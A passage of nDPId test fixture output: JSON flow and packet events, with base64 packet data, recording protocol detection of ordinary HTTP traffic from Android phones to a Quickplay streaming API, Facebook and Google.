xMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq
6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
+00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0
ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} 
+00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": 
{"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} 
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} 
+00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
+01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 